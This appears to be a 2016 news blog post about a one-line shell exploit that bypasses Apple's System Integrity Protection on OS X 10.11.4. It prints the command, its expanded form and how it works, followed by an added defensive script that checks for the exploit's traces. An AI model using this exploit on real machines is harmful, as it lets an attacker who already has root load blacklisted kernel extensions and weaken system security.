Saturday, 2 April 2016

Here's the Exploit to Bypass Apple Security Feature that Fits in a Tweet

Did you install the latest update OS X 10.11.4?

If so, you may be surprised to learn that Apple's patch turned out to be ineffective this time.

Yes! This news will disappoint many Apple users: the latest updates, OS X El Capitan 10.11.4 and iOS 9.3, still contain a privilege escalation vulnerability that could affect 130 million Apple customers.

Just last week, we reported a critical privilege escalation vulnerability in Apple's System Integrity Protection (SIP) security mechanism, affecting all versions of OS X.

Even after Apple fixed that flaw in the latest round of patches for Macs and iThings, SIP can still be bypassed on the most recent version of the operating system, leaving anyone who has already gained root on a Mac free to tamper with the files SIP is supposed to keep off-limits.

SIP Bypass Exploit Code Fits in a Tweet


Interestingly, Stefan Esser, a security researcher from Germany, has released a new exploit that bypasses SIP on the freshly patched OS X 10.11.4, and it fits in a tweet.

Here is the exploit code. It can be used to modify a crucial OS X configuration file that not even the root user is allowed to touch, The Register reported:
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The shell globs in the one-liner expand to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
Run as root, the one-liner symlinks a SIP-protected file to a bogus disk node under /dev, then lets fsck_cs, the CoreStorage consistency checker that is entitled to write to SIP-protected paths, "repair" that node and clobber the plist in the process (the 1>&- only closes stdout to keep the run quiet). Touching /Library/Extensions/ bumps the directory's modification time so the kernel extension caches are rebuilt at the next boot, and with the exclude list gone, kernel extensions that Apple has blacklisted can be loaded again. Note that this is not a remote hole: the attacker already needs root on the Mac. What the bypass buys is the ability to undo the one restriction SIP was meant to enforce on root.

What is System Integrity Protection (SIP)?


Apple introduced SIP, a kernel-level protection feature, with the release of OS X El Capitan. It restricts the root account and limits the actions a root user can perform on protected parts of the system, so that even code running as root cannot modify them.

Besides this, System Integrity Protection also helps prevent software from changing your startup volume, blocks certain kernel extensions from being loaded, and limits the debugging of certain apps.

By default, SIP protects /System, /usr, /bin and /sbin, along with the applications that come pre-installed with OS X. /usr/local, /Applications and /Library stay writable for third-party software, which is why the exploit's touch /Library/Extensions/ step needs no bypass at all.
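The one-liner above and the list of protected paths suggest a quick post-incident check for a Mac that may have been hit. The script below is an added example; it is not code from the article, from The Register or from Stefan Esser. It verifies that the kext exclude list plist is still an intact XML plist and lists any symlink directly under /dev whose target is an absolute path outside /dev, the footprint the ln -s step leaves until the next reboot recreates devfs. The plist key name OSKextExcludeList and the treatment of such symlinks as anomalous are this script's assumptions, not statements from the article; csrutil status is the stock SIP status command on 10.11 and is skipped where it does not exist.

```shell
#!/bin/sh
# Added example; not from the article, The Register, or Stefan Esser's tweet.
# Health checks for the footprint of the fsck_cs one-liner discussed above.
# Assumptions (not stated in the article): the exclude list lives in the
# kext's XML Info.plist under the key OSKextExcludeList, and a symlink under
# /dev pointing to an absolute path outside /dev is never legitimate.

EXCLUDE_PLIST="/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist"

# Return 0 if the file still looks like an XML plist carrying the exclude list,
# 1 if it is empty, truncated or overwritten (what a "repair" by fsck_cs leaves).
plist_has_exclude_list() {
    f="$1"
    [ -s "$f" ] || return 1
    head -c 5 "$f" | grep -q '<?xml' || return 1
    grep -q '<key>OSKextExcludeList</key>' "$f"
}

# Print every symlink directly under a /dev-like directory whose target is an
# absolute path outside that directory, one "link -> target" per line.
# Relative links (e.g. stdin -> fd/0) and links staying inside devfs are normal.
dev_symlinks_outside_dev() {
    dir="${1:-/dev}"
    find "$dir" -maxdepth 1 -type l 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case "$target" in
            "$dir"/*|[!/]*) ;;
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Human-readable summary; csrutil only exists on OS X 10.11 and later.
sip_report() {
    if command -v csrutil >/dev/null 2>&1; then
        csrutil status
    else
        echo "csrutil not found: not OS X, skipping SIP status"
    fi
    if plist_has_exclude_list "$EXCLUDE_PLIST"; then
        echo "kext exclude list: intact"
    else
        echo "kext exclude list: MISSING or corrupt ($EXCLUDE_PLIST)"
    fi
    echo "symlinks under /dev pointing into the filesystem:"
    dev_symlinks_outside_dev /dev
}

sip_report
```

The plist check is deliberately crude: it does not parse the plist, it only refuses files that fsck_cs would have left behind (empty, truncated or no longer starting with an XML header). On a real Mac a corrupt result means the kext caches need rebuilding from a known-good exclude list, and a hit in the /dev listing means the symlink step ran since the last boot.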

This is a bad time for Apple and its users. Let's hope the company is more thorough with its next patch.
